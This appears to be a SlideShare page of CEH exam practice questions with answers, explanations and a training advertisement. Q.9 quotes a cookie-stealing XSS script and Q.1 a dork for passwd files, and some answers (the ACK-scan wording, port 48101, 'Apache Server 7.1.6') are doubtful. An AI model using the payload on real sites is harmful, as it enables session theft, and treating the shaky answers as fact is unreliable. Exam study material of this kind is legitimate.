SlideShare a Scribd company logo

CEH Exam Practice Questions and Answers Part - 2.pdf

infosec train
infosec train

Are you ready to outsmart hackers and ace your Certified Ethical Hacker (CEH) exam? ๐Ÿ”๐Ÿ’ป Weโ€™ve compiled 23 high-yield, exam-style questions based on the latest CEH domainsโ€”designed to sharpen your skills, boost your confidence, and reinforce core concepts through real-world scenarios. ๐Ÿšจ Topics covered: โœ… Google Dorking โœ… Port Scanning Techniques โœ… Ransomware Defense โœ… Privilege Escalation โœ… Wireless & Web Attacks โœ… Rootkits, XSS, and more! Each question includes: ๐Ÿ‘‰ Realistic exam-style scenarios ๐Ÿ‘‰ Detailed explanations ๐Ÿ‘‰ Quick memory hacks ๐Ÿ’ก Whether you're revising or just starting your prep, this series is your secret weapon.

1 of 29
Download to read offline
www.infosectrain.com 03 www.infosectrain.com 01 Exam Practice Questions and Answers CEH (Certi๏ฌed Ethical Hacker) Part 2 www.infosectrain.com
www.infosectrain.com 02 Introduction Think you have what it takes to become an Ethical Hacker? Think again! The Certi๏ฌed Ethical Hacker (CEH) exam is not just another cybersecurity certi๏ฌcation; itโ€™s a rigorous test that challenges even the most seasoned professionals. With 125 complex multiple-choice questions covering 20 in-depth modules, this exam is designed to push your limits in ethical hacking techniques, reconnaissance, vulnerability exploitation, cloud computing, and more. But hereโ€™s the real challenge: not all topics carry the same weightage. Some modules, like System Hacking and Reconnaissance, demand in-depth knowledge. However, others focus on cloud security, IoT vulnerabilities, and mobile threats, making it crucial to strategize your study plan wisely. Thatโ€™s exactly why weโ€™ve compiled this guide, a handpicked selection of the top CEH exam practice questions crafted to reinforce key concepts and enhance your exam readiness. Each question is designed to mimic real exam scenarios, providing detailed explanations and quick memory hacks to reinforce your learning. So, are you ready to test your skills and see if you can think like a hacker? Letโ€™s dive into part 2.
www.infosectrain.com 03 Q.1. A hacker uses the following Google search operator: intitle:index of passwd to ๏ฌnd sensitive ๏ฌles online. What type of attack is this? Phishing SQL injection Google hacking Cross-site scripting (XSS) "Google = Open Book"โ€”Hackers use search engines to ๏ฌnd weak points. Prevent exposure by disabling directory indexing and using robots.txt ๏ฌles. STUDY TIP Answer: C. Google hacking Explanation: Google hacking (also called Google dorking) leverages advanced search operators to ๏ฌnd exposed directories, passwords, and sensitive data on public websites. Answer: C. Google hacking Explanation: Google hacking (also called Google dorking) leverages advanced search operators to ๏ฌnd exposed directories, passwords, and sensitive data on public websites. CEH (Certi๏ฌed Ethical Hacker) Exam Practice Questions and Answers
www.infosectrain.com 03 Q.2. A tester successfully exploits a web application vulnerability and gains access to the backend database. What should they do next according to ethical hacking guidelines? Download all records for analysis Report the vulnerability immediately Modify database entries for testing Leave a backdoor for future testing Answer: B. Report the vulnerability immediately Explanation: Ethical hacking is about responsible security testing. After discovering a ๏ฌ‚aw, the Ethical Hacker must document the issue and report it to the organization without causing damage. Answer: B. Report the vulnerability immediately Explanation: Ethical hacking is about responsible security testing. After discovering a ๏ฌ‚aw, the Ethical Hacker must document the issue and report it to the organization without causing damage. "Find It, Report It"โ€”Following proper responsible disclosure protects both the hacker and the organization. Always act ethically! STUDY TIP
www.infosectrain.com 05 Q.3. A company's security team detects repeated failed login attempts from multiple IPs on their SSH server. What type of attack is likely happening? SQL injection Brute-force attack Cross-site request forgery (CSRF) DNS spoo๏ฌng Answer: B. Brute-force attack Explanation: A brute-force attack attempts to guess passwords by systematically trying different combinations until access is granted. Answer: B. Brute-force attack Explanation: A brute-force attack attempts to guess passwords by systematically trying different combinations until access is granted. STUDY TIP "Slow It Down"โ€”Implement account lockouts, CAPTCHA, and Multi-factor Authentication (MFA) to defend against brute-force attacks.
www.infosectrain.com 06 Q.4. What is the most effective way to prevent privilege escalation attacks? Using strong passwords Implementing least privilege access control Disabling unused ports Encrypting all stored data "Less is More"โ€”The fewer privileges an account has, the less damage an attacker can do! STUDY TIP Answer: B. Implementing least privilege access control Explanation: Least privilege access control ensures users and applications only have the permissions they need, reducing the risk of privilege escalation. Answer: B. Implementing least privilege access control Explanation: Least privilege access control ensures users and applications only have the permissions they need, reducing the risk of privilege escalation.
www.infosectrain.com 03 Q.5. Which of the following methods is most effective for detecting and stopping ransomware attacks? Antivirus software Regular data backups and endpoint detection Disabling macros in Microsoft Of๏ฌce Changing user passwords frequently Answer: B. Regular data backups and endpoint detection Explanation: Ransomware protection relies on secure backups and real-time endpoint detection to mitigate the impact of an attack. Answer: B. Regular data backups and endpoint detection Explanation: Ransomware protection relies on secure backups and real-time endpoint detection to mitigate the impact of an attack. STUDY TIP "Backup, Detect, Protect"โ€”Regular backups and ransomware-speci๏ฌc defenses can prevent costly data loss.
www.infosectrain.com 08 Q.6. Jane, an Ethical Hacker, is testing an organizationโ€™s web server and website for security vulnerabilities. She copied the entire website onto her local drive to analyze its directory structure, ๏ฌle structure, external links, images, and web pages. This information helps her map the websiteโ€™s directories and gather valuable insights. What attack technique did Jane use? Web cache poisoning Session hijacking Website mirroring Website defacement Directory traversal Answer: C. Website mirroring Explanation: Website mirroring is the process of copying an entire website, including its content, structure, and resources, for analysis. Ethical Hackers use this technique to identify security ๏ฌ‚aws in web applications, while malicious actors may use it for phishing attacks or reconnaissance. Answer: C. Website mirroring Explanation: Website mirroring is the process of copying an entire website, including its content, structure, and resources, for analysis. Ethical Hackers use this technique to identify security ๏ฌ‚aws in web applications, while malicious actors may use it for phishing attacks or reconnaissance. Web cache poisoning: Injects malicious content into cached responses. Session hijacking: Steals session cookies to impersonate users. Website mirroring: Clones a site for analysis or phishing. Website defacement: Modi๏ฌes a websiteโ€™s content maliciously. Directory traversal: Accesses restricted directories on a web server. STUDY TIP
www.infosectrain.com 09 Q.7. Clark, a professional hacker, created and con๏ฌgured multiple domains pointing to the same host, allowing him to switch quickly between domains to evade detection. What adversary behavior does this represent? Unspeci๏ฌed proxy activities Use of command-line interface Data staging Use of DNS tunneling Fast ๏ฌ‚ux technique Answer: E. Fast ๏ฌ‚ux technique Explanation: Fast ๏ฌ‚ux is a technique where attackers rapidly change IP addresses and domain associations to evade detection. By using multiple domains pointing to the same host, attackers make it dif๏ฌcult for security systems to block their malicious infrastructure. This technique is commonly used in botnets, phishing, and malware distribution. Answer: E. Fast ๏ฌ‚ux technique Explanation: Fast ๏ฌ‚ux is a technique where attackers rapidly change IP addresses and domain associations to evade detection. By using multiple domains pointing to the same host, attackers make it dif๏ฌcult for security systems to block their malicious infrastructure. This technique is commonly used in botnets, phishing, and malware distribution. Unspeci๏ฌed proxy activities: Uses proxy servers to mask identity. Use of command-line interface: Executes attacks via CLI tools. Data staging: Prepares data before ex๏ฌltrating it. Use of DNS tunneling: Hides malicious traf๏ฌc within DNS queries. Fast ๏ฌ‚ux technique: Rapidly switches domains/IPs to evade detection. STUDY TIP
www.infosectrain.com 10 Q.8. Sam, a Penetration Tester at InfosecTrain, was assigned to perform port scanning on a target host. He sent FIN/ACK probes, and the target host responded with an RST packet, indicating that the port is closed. Which port scanning technique did Sam use? IDLE/IPID header scan Xmas scan ACK ๏ฌ‚ag probe scan TCP Maimon scan FIN scan Answer: C. ACK ๏ฌ‚ag probe scan Explanation: The ACK ๏ฌ‚ag probe scan is used to determine the state of ๏ฌrewall rules and identify whether ports are ๏ฌltered or un๏ฌltered. When an ACK probe is sent: If an RST packet is received, the port is un๏ฌltered (closed). If no response or an ICMP unreachable message is received, the port is ๏ฌltered (likely blocked by a ๏ฌrewall). Answer: C. ACK ๏ฌ‚ag probe scan Explanation: The ACK ๏ฌ‚ag probe scan is used to determine the state of ๏ฌrewall rules and identify whether ports are ๏ฌltered or un๏ฌltered. When an ACK probe is sent: If an RST packet is received, the port is un๏ฌltered (closed). If no response or an ICMP unreachable message is received, the port is ๏ฌltered (likely blocked by a ๏ฌrewall). IDLE/IPID header scan: Uses a โ€œzombieโ€ host to perform stealth scanning. Xmas scan: Sends FIN, PSH, and URG ๏ฌ‚ags; works on UNIX-based systems. ACK ๏ฌ‚ag probe scan: Identi๏ฌes ๏ฌltered vs. un๏ฌltered ports. TCP Maimon scan: Similar to FIN scan, but bypasses some ๏ฌrewalls. FIN scan: Uses FIN ๏ฌ‚ag to check if ports are open on UNIX systems. STUDY TIP
www.infosectrain.com 11 Q.9. Judy created a forum where users can post comments and images. One day, she noticed that a user was posting strange images without any comments. Concerned, she contacts a security expert, who discovers the following hidden code behind those images: <script> document.write('<img src="https://localhost/submitcookie.php?cookie=' + escape(document.cookie) + '" />'); </script> The code redirects the user to another site. The code injects a new cookie into the browser. The code is a virus that attempts to gather the userโ€™s username and password. The PHP ๏ฌle silently executes the code and grabs the userโ€™s session cookie and session ID. The code modi๏ฌes the forum database to create a backdoor. Answer: D. The PHP ๏ฌle silently executes the code and grabs the userโ€™s session cookie and session ID. Explanation: The code is an example of Cross-Site Scripting (XSS). It steals the userโ€™s session cookies by sending them to an attacker's server (submitcookie.php). With a stolen session cookie, an attacker can hijack the userโ€™s session, gaining unauthorized access to their account. Answer: D. The PHP ๏ฌle silently executes the code and grabs the userโ€™s session cookie and session ID. Explanation: The code is an example of Cross-Site Scripting (XSS). It steals the userโ€™s session cookies by sending them to an attacker's server (submitcookie.php). With a stolen session cookie, an attacker can hijack the userโ€™s session, gaining unauthorized access to their account.
www.infosectrain.com 12 XSS Attack: Injects malicious scripts into web pages. Session Hijacking: Steals session cookies for unauthorized access. Mitigation: Use HTTPOnly and Secure cookie attributes, input validation, and Content Security Policy (CSP). Stored XSS: Malicious code is permanently stored on the site. Re๏ฌ‚ected XSS: Malicious code is executed only when a user clicks a crafted link. STUDY TIP Q.10. A hacker sends a malicious script disguised as an image ๏ฌle to a victim. When the victim opens the ๏ฌle, their browser executes the script, stealing their session tokens. What type of attack is this? SQL injection Cross-site Scripting (XSS) Command injection XML External Entity (XXE) attack Answer: B. Cross-site Scripting (XSS) Explanation: XSS attacks inject malicious scripts into web pages that execute in the victimโ€™s browser, allowing attackers to steal session cookies and sensitive data. Answer: B. Cross-site Scripting (XSS) Explanation: XSS attacks inject malicious scripts into web pages that execute in the victimโ€™s browser, allowing attackers to steal session cookies and sensitive data. "Never Trust User Input"โ€”Always validate, sanitize, and encode user input to prevent XSS attacks! STUDY TIP
www.infosectrain.com 13 Q.11. Which type of wireless attack involves capturing authentication handshakes to crack Wi-Fi passwords? Rogue access point attack Evil twin attack WPA2 handshake capture attack Bluetooth snif๏ฌng Answer: C. WPA2 handshake capture attack Explanation: Attackers capture WPA2 handshake packets using tools like Aircrack-ng and attempt to crack the Wi-Fi password through brute force. Answer: C. WPA2 handshake capture attack Explanation: Attackers capture WPA2 handshake packets using tools like Aircrack-ng and attempt to crack the Wi-Fi password through brute force. STUDY TIP "Strong Passwords Win"โ€”Use long, complex Wi-Fi passwords and enable WPA3 if possible!
www.infosectrain.com 14 Q.12. Susan, a Software Developer, wants her web API to update other applications with the latest information. She uses a user-de๏ฌned HTTP callback or push API that triggers events to supply data in real-time, allowing users to receive instant updates. What technique is she using? Answer: A. Webhooks Explanation: Webhooks are event-driven HTTP callbacks that automatically send data to other applications when a trigger event occurs. Unlike REST APIs that require polling, webhooks push real-time updates, improving ef๏ฌciency and reducing server load. Answer: A. Webhooks Explanation: Webhooks are event-driven HTTP callbacks that automatically send data to other applications when a trigger event occurs. Unlike REST APIs that require polling, webhooks push real-time updates, improving ef๏ฌciency and reducing server load. Webhooks REST API SOAP API Web shells Server-Sent Events (SSE) Webhooks: Push-based, triggered by events. REST API: Pull-based, requires periodic requests. SOAP API: Uses XML, a more complex and strict structure. Web shells: Malicious scripts used for remote control. Server-Sent Events (SSE): One-way connection from server to client. STUDY TIP
www.infosectrain.com 15 Q.13. A Red Team Tester wants to remain undetected while scanning an internal network. Which Nmap option should they use? -T5 -A -sS -sT Answer: C. -sS Explanation: The SYN scan (-sS) is stealthier than a full TCP connect scan because it does not complete the three-way handshake, making it harder for IDS/IPS systems to detect. Answer: C. -sS Explanation: The SYN scan (-sS) is stealthier than a full TCP connect scan because it does not complete the three-way handshake, making it harder for IDS/IPS systems to detect. -T5: Too fast, easily detected. Trick: "Turbo = Trouble." -A: Aggressive mode, loud scan. Trick: "A for Alert." -sS: Stealthy, avoids full handshake. Trick: "Silent SYN." -sT: Full handshake, easily logged. Trick: "T for Tracked. STUDY TIP "Stealth is Key"โ€”Use SYN scans for quiet reconnaissance and avoid detection.
www.infosectrain.com 16 Q.14. During the enumeration phase, Lawrence performs banner grabbing to gather information such as OS details and service versions. He targets a service running on TCP port 445. Which service did Lawrence enumerate? Answer: D. Server Message Block (SMB) Explanation: Server Message Block (SMB) operates on TCP port 445 and is used for ๏ฌle sharing, printer access, and network communication in Windows environments. Attackers often enumerate SMBs to extract user accounts and shared resources as well as exploit vulnerabilities like EternalBlue. Answer: D. Server Message Block (SMB) Explanation: Server Message Block (SMB) operates on TCP port 445 and is used for ๏ฌle sharing, printer access, and network communication in Windows environments. Attackers often enumerate SMBs to extract user accounts and shared resources as well as exploit vulnerabilities like EternalBlue. Remote Procedure Call (RPC) Telnet Network File System (NFS) Server Message Block (SMB) Secure Shell (SSH) RPC (Remote Procedure Call): Runs on port 135, used for inter-process communication. Telnet: Runs on port 23 and provides remote command-line access. NFS (Network File System): Runs on port 2049, and allows ๏ฌle sharing in UNIX/Linux. SMB (Server Message Block): Runs on port 445, used for Windows ๏ฌle sharing. SSH (Secure Shell): Runs on port 22 and encrypts remote administration sessions. STUDY TIP
www.infosectrain.com 17 Q.15. An attacker sets up a fake Wi-Fi hotspot with a name similar to a nearby legitimate network to trick users into connecting. What is this attack called? DNS Spoo๏ฌng Evil Twin Attack Rogue DHCP Attack SSID Flooding Answer: B. Evil Twin Attack Explanation: Evil Twin attacks involve setting up a rogue wireless access point that mimics a legitimate one, tricking users into connecting and exposing their credentials. Answer: B. Evil Twin Attack Explanation: Evil Twin attacks involve setting up a rogue wireless access point that mimics a legitimate one, tricking users into connecting and exposing their credentials. STUDY TIP "Always Verify Wi-Fi"โ€”Before connecting, verify the Wi-Fi network name and ask IT for con๏ฌrmation!
www.infosectrain.com 18 Q.16. An attacker successfully installs a keylogger on a victim's machine to capture sensitive credentials. What type of attack is this? Spyware attack Phishing attack Rootkit attack Denial-of-Service (DoS) attack Answer: A. Spyware attack Explanation: Spyware is malicious software designed to secretly record user activity, such as keystrokes, and send it to attackers. Answer: A. Spyware attack Explanation: Spyware is malicious software designed to secretly record user activity, such as keystrokes, and send it to attackers. STUDY TIP "KEY = Keep Examining Your system"โ€”Run frequent malware scans and avoid unknown software!
www.infosectrain.com 19 Q.17. What is the most effective way to mitigate a brute-force attack on a login portal? Increasing password complexity Implementing account lockout policies Encrypting all stored passwords Using a VPN Answer: B. Implementing account lockout policies Explanation: Account lockout policies help prevent brute-force attacks by locking accounts after a set number of failed login attempts. Answer: B. Implementing account lockout policies Explanation: Account lockout policies help prevent brute-force attacks by locking accounts after a set number of failed login attempts. STUDY TIP "BLOCK = Brute-force Lockout On Count"โ€”Set up MFA and lockout policies to prevent brute-force attacks!
www.infosectrain.com 20 Q.18. Which Google advanced search operator helps an attacker ๏ฌnd websites similar to a speci๏ฌed target URL? Answer: B. related: Explanation: The related: operator helps ๏ฌnd websites similar to a speci๏ฌed domain. Attackers use it for competitive analysis, reconnaissance, and expanding target scope during OSINT (Open-Source Intelligence) gathering. Answer: B. related: Explanation: The related: operator helps ๏ฌnd websites similar to a speci๏ฌed domain. Attackers use it for competitive analysis, reconnaissance, and expanding target scope during OSINT (Open-Source Intelligence) gathering. site: related: info: inurl: cache: site: --> Searches within a speci๏ฌc domain (site:example.com). related: --> Finds similar websites (related:example.com). info: --> Displays cached pages and link details (info:example.com). inurl: --> Finds URLs containing speci๏ฌc keywords (inurl:admin). cache: --> Shows Googleโ€™s last cached version of a page (cache:example.com). STUDY TIP
www.infosectrain.com 21 Q.19. An attacker installs a rootkit that remains undetected in the core components of the operating system, allowing them to maintain access to a machine invisibly. What type of rootkit is this? Answer: C. Kernel rootkit Explanation: A kernel rootkit operates at the operating systemโ€™s core (kernel level), making it extremely dif๏ฌcult to detect and remove. It intercepts system calls, hides processes, and provides persistent backdoor access while remaining invisible to antivirus software. Answer: C. Kernel rootkit Explanation: A kernel rootkit operates at the operating systemโ€™s core (kernel level), making it extremely dif๏ฌcult to detect and remove. It intercepts system calls, hides processes, and provides persistent backdoor access while remaining invisible to antivirus software. Firmware rootkit Hypervisor rootkit Kernel rootkit Hardware rootkit User-mode rootkit Firmware rootkit: Embedded in hardware ๏ฌrmware (BIOS, UEFI). Hypervisor rootkit: Runs beneath the OS, controlling it. Kernel rootkit: Hides in the OS kernel, most stealthy. Hardware rootkit: Resides in system hardware (chipsets). User-mode rootkit: Runs in user space, easier to detect. STUDY TIP
www.infosectrain.com 22 Q.20. While performing a web application scan, you want to determine the web server version hosting the application. Using the -sV ๏ฌ‚ag with Nmap, you receive this response: 80/tcp open http-proxy Apache Server 7.1.6. What information-gathering technique does this describe? Answer: C. Banner grabbing Explanation: Banner grabbing is a technique used to gather information about a service by retrieving its version, operating system, and other metadata. The -sV ๏ฌ‚ag in Nmap is speci๏ฌcally used for service version detection, helping security professionals assess potential vulnerabilities. Answer: C. Banner grabbing Explanation: Banner grabbing is a technique used to gather information about a service by retrieving its version, operating system, and other metadata. The -sV ๏ฌ‚ag in Nmap is speci๏ฌcally used for service version detection, helping security professionals assess potential vulnerabilities. Dictionary attack Brute forcing Banner grabbing WHOIS lookup Passive reconnaissance Dictionary attack: Uses a pre-compiled list of passwords for cracking. Brute forcing: Tries all possible password combinations. Banner grabbing: Extracts server details from response headers. WHOIS lookup: Retrieves domain registration info. Passive reconnaissance: Collects data without direct interaction. STUDY TIP
www.infosectrain.com 23 Q.21. John is investigating web application ๏ฌrewall logs and notices an attempt to inject the following code: char buff[10]; buff[10] = 'a'; What type of attack is this? Answer: C. Buffer over๏ฌ‚ow Explanation: A buffer over๏ฌ‚ow attack occurs when a program writes data beyond the allocated memory buffer. In this case, buff[10] = 'a'; attempts to write outside the bounds of the buffer, which can cause memory corruption, crashes, or remote code execution. Answer: C. Buffer over๏ฌ‚ow Explanation: A buffer over๏ฌ‚ow attack occurs when a program writes data beyond the allocated memory buffer. In this case, buff[10] = 'a'; attempts to write outside the bounds of the buffer, which can cause memory corruption, crashes, or remote code execution. SQL injection CSRF Buffer over๏ฌ‚ow XSS Directory traversal SQL Injection: Injects malicious SQL queries into a database. CSRF (Cross-Site Request Forgery): Tricks users into executing unwanted actions. Buffer Over๏ฌ‚ow: Overwrites memory, leading to crashes or exploits. XSS (Cross-Site Scripting): Injects malicious JavaScript into web pages. Directory Traversal: Gains unauthorized access to system ๏ฌles. STUDY TIP
www.infosectrain.com 24 Q.22. Which common ๏ฌles on a web server, if miscon๏ฌgured, could expose useful information such as verbose error messages to hackers? Answer: B. php.ini Explanation: The php.ini ๏ฌle controls PHP settings, including error reporting and logging. If miscon๏ฌgured, it may expose verbose error messages, ๏ฌle paths, and database credentials, helping attackers exploit vulnerabilities. Answer: B. php.ini Explanation: The php.ini ๏ฌle controls PHP settings, including error reporting and logging. If miscon๏ฌgured, it may expose verbose error messages, ๏ฌle paths, and database credentials, helping attackers exploit vulnerabilities. administration.con๏ฌg php.ini httpd.conf idq.dll web.con๏ฌg administration.con๏ฌg: Not a common web server con๏ฌg ๏ฌle. php.ini: Manages PHP settings, crucial for security. httpd.conf: Con๏ฌgures Apache web server settings. idq.dll: Old IIS indexing service component. web.con๏ฌg: ASP.NET con๏ฌguration ๏ฌle, contains sensitive settings. STUDY TIP
www.infosectrain.com 25 Q.23. If you suspect an IoT device has been compromised, which port should you block ๏ฌrst? Answer: A. 48101 Explanation: Port 48101 is commonly used by IoT devices for remote access and botnet communication. Attackers often target IoT devices for DDoS attacks, unauthorized control, and data theft. Blocking this port can limit attacker access. Answer: A. 48101 Explanation: Port 48101 is commonly used by IoT devices for remote access and botnet communication. Attackers often target IoT devices for DDoS attacks, unauthorized control, and data theft. Blocking this port can limit attacker access. 48101 443 80 22 23 Port 48101: Used by compromised IoT devices for C2 (Command & Control). Port 443 (HTTPS): Encrypts web traf๏ฌc, usually safe. Port 80 (HTTP): Handles unencrypted web traf๏ฌc. Port 22 (SSH): Used for remote access, often targeted. Port 23 (Telnet): Unsecured remote login, commonly exploited. STUDY TIP
www.infosectrain.com 26 Q.24. Heatherโ€™s company is adopting a new cloud-hosted customer relationship management (CRM) tool. The provider will handle hardware, OS, software administration, patching, and monitoring, while Heatherโ€™s only task is user account management. What type of cloud solution is this? Answer: A. SaaS (Software as a Service) Explanation: SaaS is a fully managed cloud solution where users access applications over the internet without managing infrastructure, OS, or software updates. Examples include CRM tools (e.g., Salesforce), email services (e.g., Gmail), and collaboration platforms (e.g., Microsoft 365). Answer: A. SaaS (Software as a Service) Explanation: SaaS is a fully managed cloud solution where users access applications over the internet without managing infrastructure, OS, or software updates. Examples include CRM tools (e.g., Salesforce), email services (e.g., Gmail), and collaboration platforms (e.g., Microsoft 365). SaaS CaaS PaaS IaaS FaaS SaaS (Software as a Service): Fully managed software, just use it. CaaS (Container as a Service): Manages containers in the cloud. PaaS (Platform as a Service): Provides a development environment. IaaS (Infrastructure as a Service): Gives virtual machines & storage. FaaS (Function as a Service): Runs serverless functions on demand. STUDY TIP
www.infosectrain.com 27 Q.25. During a penetration test, you gained access to a user account. You connected to your own machine via the SMB service and entered your login and password in plaintext. Which ๏ฌle must you clean to remove the password? Answer: A. .bash_history Explanation: The .bash_history ๏ฌle logs previously executed commands, including credentials entered in plaintext. Clearing or securely deleting this ๏ฌle prevents password recovery by an attacker or forensic investigator. Answer: A. .bash_history Explanation: The .bash_history ๏ฌle logs previously executed commands, including credentials entered in plaintext. Clearing or securely deleting this ๏ฌle prevents password recovery by an attacker or forensic investigator. .bash_history .xsession-log .bashrc .pro๏ฌle syslog .bash_history: Stores command history, including passwords. .xsession-log: Logs X session events, not commands. .bashrc: Con๏ฌgures bash shell settings, no history. .pro๏ฌle: Loads user environment variables, no history. syslog: Stores system logs, but not user commands. STUDY TIP
www.infosectrain.com 28 Summary Mastering ethical hacking requires more than theoretical knowledgeโ€”it demands hands-on experience, real-world scenarios, and continuous learning. This guide covered top essential CEH questions, helping you understand key security concepts such as penetration testing, malware analysis, and cryptographic attacks. While self-study is valuable, a structured learning approach accelerates success. InfosecTrainโ€™s CEH Training Course provides: Ready to take the next step? Elevate your CEH preparation with InfosecTrainโ€™s CEH Training Course and become a Certi๏ฌed Ethical Hacker with con๏ฌdence! Enroll now! Visit www.InfosecTrain.com to learn more. Expert-Led Training: Learn from certi๏ฌed CEH professionals with industry experience. Hands-On Labs: Gain practical skills through real-world hacking scenarios. Exam-Focused Content: Covers the latest CEH v13 curriculum, including updated cyber threats and ethical hacking techniques. Flexible Learning Options: Choose from self-paced, instructor-led, or corporate training tailored to your schedule.
www.infosectrain.com 03 Contact us www.infosectrain.com sales@infosectrain.com Follow us on
Ad

Recommended

CEH Exam Practice Questions and Answers Part -1.pdf
CEH Exam Practice Questions and Answers Part -1.pdfCEH Exam Practice Questions and Answers Part -1.pdf
CEH Exam Practice Questions and Answers Part -1.pdf
infosecTrain
ย 
Certified ethical hacker exam practice questions and answers part 1
Certified ethical hacker exam practice questions and answers part 1Certified ethical hacker exam practice questions and answers part 1
Certified ethical hacker exam practice questions and answers part 1
priyanshamadhwal2
ย 
CEH Exam Practice Questions and Answers Part -1.pdf
CEH Exam Practice Questions and Answers Part -1.pdfCEH Exam Practice Questions and Answers Part -1.pdf
CEH Exam Practice Questions and Answers Part -1.pdf
infosec train
ย 
Certified ethical hacker (cehv11) exam dumps 2022
Certified ethical hacker (cehv11) exam dumps 2022Certified ethical hacker (cehv11) exam dumps 2022
Certified ethical hacker (cehv11) exam dumps 2022
SkillCertProExams
ย 
312 50-demo
312 50-demo312 50-demo
312 50-demo
Tomas Vileikis
ย 
ComTIA Cysa+ - SY-601-Corrected Dump.pdf
ComTIA Cysa+ - SY-601-Corrected Dump.pdfComTIA Cysa+ - SY-601-Corrected Dump.pdf
ComTIA Cysa+ - SY-601-Corrected Dump.pdf
hieunn131
ย 
Top 20 certified ethical hacker interview questions and answer
Top 20 certified ethical hacker interview questions and answerTop 20 certified ethical hacker interview questions and answer
Top 20 certified ethical hacker interview questions and answer
ShivamSharma909
ย 
Ethical Hacking Interview Questions and Answers.pdf
Ethical Hacking Interview Questions and Answers.pdfEthical Hacking Interview Questions and Answers.pdf
Ethical Hacking Interview Questions and Answers.pdf
ShivamSharma909
ย 
Slide Deck Class Session 11 โ€“ FRSecure CISSP Mentor Program
Slide Deck Class Session 11 โ€“ FRSecure CISSP Mentor ProgramSlide Deck Class Session 11 โ€“ FRSecure CISSP Mentor Program
Slide Deck Class Session 11 โ€“ FRSecure CISSP Mentor Program
FRSecure
ย 
Latest CompTIA Security+ (SY0-701) Exam Dumps 2024 updated
Latest CompTIA Security+ (SY0-701) Exam Dumps 2024 updatedLatest CompTIA Security+ (SY0-701) Exam Dumps 2024 updated
Latest CompTIA Security+ (SY0-701) Exam Dumps 2024 updated
SkillCertProExams
ย 
CISSP Exam Dumps 2022
CISSP Exam Dumps 2022CISSP Exam Dumps 2022
CISSP Exam Dumps 2022
bronxfugly43
ย 
Andrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptAndrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.ppt
SilverGold16
ย 
Slide Deck โ€“ Session 11 โ€“ FRSecure CISSP Mentor Program 2017
Slide Deck โ€“ Session 11 โ€“ FRSecure CISSP Mentor Program 2017Slide Deck โ€“ Session 11 โ€“ FRSecure CISSP Mentor Program 2017
Slide Deck โ€“ Session 11 โ€“ FRSecure CISSP Mentor Program 2017
FRSecure
ย 
Sharpening your Threat-Hunting Program with ATTACK Framework
Sharpening your Threat-Hunting Program with ATTACK FrameworkSharpening your Threat-Hunting Program with ATTACK Framework
Sharpening your Threat-Hunting Program with ATTACK Framework
MITRE - ATT&CKcon
ย 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
Moataz Kamel
ย 
CYSA+ Dumps Download Updated Questions and Answers
CYSA+ Dumps Download Updated Questions and AnswersCYSA+ Dumps Download Updated Questions and Answers
CYSA+ Dumps Download Updated Questions and Answers
jackjohnson9842
ย 
CEH v13 Syllabus_ A Comprehensive Guide to Mastering Ethical Hacking.pptx
CEH v13 Syllabus_ A Comprehensive Guide to Mastering Ethical Hacking.pptxCEH v13 Syllabus_ A Comprehensive Guide to Mastering Ethical Hacking.pptx
CEH v13 Syllabus_ A Comprehensive Guide to Mastering Ethical Hacking.pptx
Nytcc
ย 
Dr.J.Jegan - Ethical Hacking - 06.12.2024.pptx
Dr.J.Jegan - Ethical Hacking - 06.12.2024.pptxDr.J.Jegan - Ethical Hacking - 06.12.2024.pptx
Dr.J.Jegan - Ethical Hacking - 06.12.2024.pptx
FerozaMirajkar1
ย 
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
IBM Security
ย 
OWASPTop 10
OWASPTop 10OWASPTop 10
OWASPTop 10
InnoTech
ย 
Sec 572 Effective Communication - tutorialrank.com
Sec 572 Effective Communication - tutorialrank.comSec 572 Effective Communication - tutorialrank.com
Sec 572 Effective Communication - tutorialrank.com
Bartholomew99
ย 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Brian Huff
ย 
Ethical hacking interview questions and answers
Ethical hacking interview questions and answersEthical hacking interview questions and answers
Ethical hacking interview questions and answers
ShivamSharma909
ย 
SEC 572 Entire Course NEW
SEC 572 Entire Course NEWSEC 572 Entire Course NEW
SEC 572 Entire Course NEW
shyamuopiv
ย 
Internal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guideInternal penetration test_hitchhackers_guide
Internal penetration test_hitchhackers_guide
Darin Fredde
ย 
Penetration Testing Basics
Penetration Testing BasicsPenetration Testing Basics
Penetration Testing Basics
Rick Wanner
ย 
Comptia security+ (sy0-601) exam dumps 2022
Comptia security+ (sy0-601) exam dumps 2022Comptia security+ (sy0-601) exam dumps 2022
Comptia security+ (sy0-601) exam dumps 2022
SkillCertProExams
ย 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
abhijitapatil
ย 
Understanding Top Cybersecurity Risk Metrics.pdf
Understanding Top Cybersecurity Risk Metrics.pdfUnderstanding Top Cybersecurity Risk Metrics.pdf
Understanding Top Cybersecurity Risk Metrics.pdf
infosec train
ย 
Ben 10 Security Day.pdf InfosecTrain
Ben 10 Security Day.pdf InfosecTrainBen 10 Security Day.pdf InfosecTrain
Ben 10 Security Day.pdf InfosecTrain
infosec train
ย 
Ad

More Related Content

Similar to CEH Exam Practice Questions and Answers Part - 2.pdf (20)

Slide Deck Class Session 11 โ€“ FRSecure CISSP Mentor Program
Slide Deck Class Session 11 โ€“ FRSecure CISSP Mentor ProgramSlide Deck Class Session 11 โ€“ FRSecure CISSP Mentor Program
Slide Deck Class Session 11 โ€“ FRSecure CISSP Mentor Program
FRSecure
ย 
Latest CompTIA Security+ (SY0-701) Exam Dumps 2024 updated
